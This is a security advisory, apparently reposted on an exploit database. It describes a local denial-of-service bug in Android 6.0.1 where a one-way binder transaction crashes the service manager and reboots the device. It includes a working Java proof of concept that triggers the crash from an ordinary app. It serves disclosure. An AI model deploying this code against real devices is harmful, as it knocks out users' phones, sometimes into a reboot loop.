Android: Service Manager Crashes on One Way Binder Transaction - Android: Service Manager Crashes on One Way Binder Transaction Platform: Tested on Android 6.0.1 February patches Class: Local DoS Summary: If an application send a one way binder transaction the service tries to send a reply which fails. This causes the service manager to exit its binder loop and the process dies causing the system to reboot. Description: The service manager binder loop isn’t very tolerant to failure, any problem with the binding causes the main loop to exit and the service manager process to close. This has a knock on effect on the entire device. As the service manager is crucial for the operation of the platform it going away causes many other services to fail leading to a reboot of at least the UI, if not the entire device. Now failure of the binder itself it perhaps something which can’t be guarded against but there’s one failure which could be anticipated, when a client sends a one way transaction. When a client sends this the service manager code in /frameworks/native/cmds/servicemanager/binder.c tries to send a reply, as the binder transaction isn’t expecting the reply it sets the BR_FAILED_REPLY status which causes binder_parse to return -1. This error propagates back to binder_loop with the following code: if (res < 0) { ALOGE("binder_loop: io error %d %s\n", res, strerror(errno)); break; } This causes the loop to exit which means the service manager exits. Proof of Concept: I’ve provided a PoC which exploits the issue and causes the device to reboot. Depending on the device and OS version this seems to either cause a very temporary condition or a reboot cycle which needs a hard reboot to fix. To use copy the following code into an application and call it. static class IExampleServer extends Binder { } void runServiceManagerCrash() throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, RemoteException { Class c = Class.forName("com.android.internal.os.BinderInternal"); Method m = c.getMethod("getContextObject"); IBinder serviceManager = (IBinder)m.invoke(null); Parcel data = Parcel.obtain(); Parcel reply = Parcel.obtain(); data.writeInterfaceToken("android.os.IServiceManager"); data.writeString("IExampleServer"); data.writeStrongBinder(new IExampleServer()); data.writeInt(0); serviceManager.transact(3, data, reply, IBinder.FLAG_ONEWAY); } This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Reported in AOSP as https://code.google.com/p/android/issues/detail?id=200612 The developers have stated that this is fixed in the next version of Android and will not be back ported. Marking as fixed for that reason. Found by: forshaw # Iranian Exploit DataBase = http://IeDb.Ir [2016-04-29]